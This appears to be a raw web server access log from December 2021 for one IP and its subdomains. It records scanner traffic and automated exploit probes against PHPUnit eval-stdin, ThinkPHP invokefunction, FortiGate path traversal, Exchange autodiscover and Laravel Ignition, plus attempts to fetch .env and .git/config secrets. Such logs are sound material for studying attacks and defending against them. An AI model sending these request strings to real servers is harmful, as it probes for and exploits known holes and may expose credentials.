https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:07:35:08 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:07:54:30 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 124.126.78.132] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; MI 2 Build/O012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [06/Dec/2021:08:38:03 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:09:19:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:09:26:13 +0000] 444 - GET https agent.moralanimal.net "/" [Client 165.227.66.98] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [06/Dec/2021:09:40:29 +0000] 444 - GET https outlook.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [06/Dec/2021:09:44:13 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Dec/2021:09:48:28 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:10:21:03 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [06/Dec/2021:10:55:56 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:10:57:34 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 206.188.196.36] [Length 0] [Gzip -] "Python-urllib/3.8" "-" [06/Dec/2021:11:43:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [06/Dec/2021:11:43:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [06/Dec/2021:11:44:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.71] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [06/Dec/2021:11:54:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:12:18:25 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [06/Dec/2021:12:57:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:13:03:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:13:03:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:13:03:20 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Dec/2021:13:22:16 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.94.186.152] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:13:46:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Dec/2021:13:51:27 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:14:32:44 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Dec/2021:14:32:44 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [06/Dec/2021:14:38:34 +0000] 444 - GET https remote.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [06/Dec/2021:15:20:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Dec/2021:16:00:34 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:16:14:17 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:16:14:17 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:16:29:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.195.161] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:18:13:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:19:08:58 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.96.130.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [06/Dec/2021:19:22:10 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [06/Dec/2021:19:36:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:19:36:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:19:38:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:19:49:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:20:00:37 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 45.134.144.108] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64" "-" [06/Dec/2021:20:29:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Dec/2021:20:57:18 +0000] 400 - GET http localhost "/" [Client 147.182.150.169] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:20:58:13 +0000] 400 - - http localhost "-" [Client 45.146.164.132] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:21:00:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:21:00:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.43] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:21:00:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:21:00:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:21:45:23 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [06/Dec/2021:23:33:00 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [07/Dec/2021:00:21:10 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:00:37:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:01:11:33 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 104.131.105.22] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:01:18:45 +0000] 444 - GET https io.moralanimal.net "/" [Client 165.227.191.175] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:01:21:45 +0000] 444 - GET https sql.moralanimal.net "/" [Client 104.131.118.203] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:01:23:04 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 165.227.186.118] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:01:33:37 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Dec/2021:01:36:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.72] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:01:37:55 +0000] 400 - - http localhost "-" [Client 94.232.42.169] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:01:38:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [07/Dec/2021:01:52:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [07/Dec/2021:01:57:56 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Dec/2021:02:07:40 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 167.99.53.62] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:18:40 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 159.65.245.167] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:23:39 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:02:26:27 +0000] 444 - GET https router.moralanimal.net "/" [Client 104.131.70.233] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:29:16 +0000] 444 - GET https opds.moralanimal.net "/" [Client 167.99.60.205] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:42:15 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:02:42:38 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 159.65.177.53] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:46:32 +0000] 444 - GET https home.moralanimal.net "/" [Client 159.65.251.192] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:47:28 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 138.197.101.145] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:02:59:50 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 159.65.255.10] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:03:01:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:03:03:56 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 167.71.174.122] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:03:05:35 +0000] 444 - GET https komga.moralanimal.net "/" [Client 104.131.114.80] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Dec/2021:03:28:12 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:03:28:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.196] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:03:28:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "-" "-" [07/Dec/2021:03:28:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Dec/2021:04:02:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:04:43:00 +0000] 444 - GET https jdownloader.moralanimal.net "/.git/config" [Client 176.10.99.200] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [07/Dec/2021:05:52:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Dec/2021:06:29:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:07:08:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:07:08:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [07/Dec/2021:07:08:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Dec/2021:07:21:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [07/Dec/2021:07:21:23 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211207152123" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [07/Dec/2021:07:27:01 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:09:00:11 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:09:23:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:09:38:46 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:09:38:46 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:09:39:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:10:21:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:10:22:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [07/Dec/2021:10:24:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:10:51:53 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:11:02:29 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.250] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:11:44:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [07/Dec/2021:11:44:14 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.150] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:11:44:14 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.101.150] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:11:44:15 +0000] 400 - - https localhost "-" [Client 185.220.101.150] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:11:44:22 +0000] 400 - - https localhost "-" [Client 185.220.101.150] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:12:19:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:12:52:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:13:28:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:13:28:09 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:13:28:09 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:14:49:22 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 139.162.215.70] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:14:59:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:15:21:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 62.210.10.118] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" [07/Dec/2021:16:23:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:16:28:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:17:53:12 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:17:53:13 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:17:53:13 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:19:11:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 27.115.124.10] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:19:11:37 +0000] 400 - - https localhost "-" [Client 27.115.124.36] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:19:11:38 +0000] 400 - - http localhost "-" [Client 27.115.124.108] [Length 154] [Gzip -] "-" "-" [07/Dec/2021:19:11:48 +0000] 400 - - https localhost "-" [Client 27.115.124.10] [Length 0] [Gzip -] "-" "-" [07/Dec/2021:19:12:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 27.115.124.37] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/93.0.4577.0 Safari/537.36" "-" [07/Dec/2021:19:42:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:19:45:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:19:45:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:20:20:10 +0000] 444 - GET https smtp.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [07/Dec/2021:20:47:35 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:21:24:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Dec/2021:21:43:31 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.77.162.27] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [07/Dec/2021:22:09:48 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Dec/2021:23:18:44 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.208.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Dec/2021:23:38:00 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.194.47] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:00:06:11 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:00:41:25 +0000] 400 - POST http 64.22.31.253 "/98789357" [Client 217.138.211.252] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "-" [08/Dec/2021:01:01:07 +0000] 444 - POST https 64.22.31.253 